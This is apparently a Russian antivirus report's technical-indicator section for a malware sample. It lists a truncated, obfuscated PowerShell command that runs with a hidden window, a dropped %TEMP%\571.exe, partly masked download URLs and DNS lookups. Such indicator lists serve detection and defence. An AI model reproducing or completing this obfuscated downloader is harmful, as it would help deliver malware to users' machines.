Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $ENV:COmspec[4,24,25]-Join'')([StrIng]::JOIN( '',('116x39Z49I25<109H62x53W39x125u63<50I58H53u51u36Z112W30V53H36I126<7Z53Z50<19!60V57H53I62W36Z107I116!3!57u38@109I119@56<36W36@32@106u127H127...
- %TEMP%\571.exe
- %TEMP%\571.exe
- http://ma##p.net/w2u4kwT/
- http://www.su####allives.com/WdnX2iVg/
- http://mo##vi.hu/nxmoQ9pDQm/
- DNS ASK gi###aster.ml
- DNS ASK ma##p.net
- DNS ASK su####allives.com
- DNS ASK mo##vi.hu
- DNS ASK er####nter.co.il
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $ENV:COmspec[4,24,25]-Join'')([StrIng]::JOIN( '',('116x39Z49I25<109H62x53W39x125u63<50I58H53u51u36Z112W30V53H36I126<7Z53Z50<19!60V57H53I62W36Z107I116!3!57u38@109I119@56<36W36@32@106u127H127...' (со скрытым окном)